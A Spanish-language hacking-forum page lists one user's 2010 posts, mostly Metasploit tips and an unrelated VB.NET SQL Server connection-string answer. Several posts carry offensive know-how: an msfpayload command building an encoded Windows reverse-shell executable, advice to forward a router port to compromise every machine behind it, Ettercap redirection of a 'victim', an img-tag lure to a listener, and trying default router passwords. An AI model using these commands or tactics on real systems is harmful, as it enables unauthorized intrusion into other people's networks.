Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3431
Hacking / Re: ok, estoy en el router..
18 Febrero 2010, 19:28 PM
Cita de: kamsky en 18 Febrero 2010, 14:17 PM..., así que recomiendo a TODO el mundo, no sólo a ti, que antes de usar herramientas que te lo dan todo hecho, aprendan a hacer las cosas y entender el porqué, y luego ya usa las tools que quieras...
Es verdad lo que dice kamsky. ;D




Cita de: illera88 en 18 Febrero 2010, 15:26 PMel que suele utilizar shell root en sus tutos y yo también
xD, pero no solo lo uso porque sea el unico que sé explotar, solo que como voy a explicar cosas diferentes a la explotancio de los fallos de servicios, uso ese.
#3432
Hacking / Re: Encoders de Metasploit
18 Febrero 2010, 17:31 PM
mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.




Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD
#3433
Exacto!
#3434
Hacking / Re: ok, estoy en el router..
18 Febrero 2010, 05:41 AM
Intentad conseguir que un puerto sea redirigido hacia vos, con esto podes usar el metasploit y comprometer a todas las maquinas conectadas al router!
#3435
illera88, depende de como esté tu situación, imagina que estás en red con la victima, realizas una redirección con Ettercap y voala, tenes lo que querás. Tambien podes hacer uso de la tecnica URL OBFUSCATION.

PD: Creo que sirve algo como esto. No sé!
[img=http://172.0.0.1:8080/][/img]
ó
<img src="http://172.0.0.1:8080/" />
#3436
Aver, no dije DIRECTAMENTE, que era el Nombre_del_PC/SQLEXPRESS, es el nombre que le diste a la instancia del SQL, cuando se está instalando. Ahora, veo que el error no es en la conexion del SQL, sino al momento de crear la base de datos.

Leeté esto http://www.elguille.info/NET/adonet/Crear_una_base_de_datos_de_SQL_Server_mediante_codigo_de_Visual_Basic.htm

Saludos!
#3437
Dentro de la variable de conexión
Código (vbnet) [Seleccionar]
Dim myConn As SqlConnection = New SqlConnection("Server=127.0.0.1;uid=sa;pwd=;database=master")

Deberia ser así: (Ejemplo en SQL Server 2008)
Código (vbnet) [Seleccionar]
Public strcnn As New SqlConnection("Data Source=ALEX\SHELLROOT;Initial Catalog=BD_HackLAB;Integrated Security=SSPI;")

Donde dicé Data Source=ALEX\SHELLROOT;, al momento de realizar la instalación, le podes asiganar el nombre de la instacia del SQL, por lo generar es Nombre_del_Equipo\SQLEXPRESS.

PD: http://www.connectionstrings.com/ Selecciona el Motor de Base de Datos que estas usando y mirás los String de Conexión
#3438
Hacking / Re: metasploit para vista
17 Febrero 2010, 00:59 AM
Cita de: beholdthe en 17 Febrero 2010, 00:38 AMentonces que me sugieres, que lo instale mejor asi como me dices tu, o q siga los pasos de la pagina oficial que puse en el enlace¿?¡
Eso lo decides tú




Cita de: beholdthe en 17 Febrero 2010, 00:38 AMsi me sirve los comandos q me has dado tu par instalar la ultima version del metasploit  en mi ubuntu 9.04   perfecto
Emm así lo hicé en Ubuntu 9.10

#3439
Intentad con contraseñas por defecto, algunos usuarios no la cambian  >:D

http://www.routerpasswords.com/index.asp
#3440
No sé como será eso, lo unico parecido que conozco con el Metasploit, es teniendo una session del Meterpreter y ejecutar el comando portfwd (Nos permite forwardear un puerto local del atacante, a un servicio remoto de una víctima)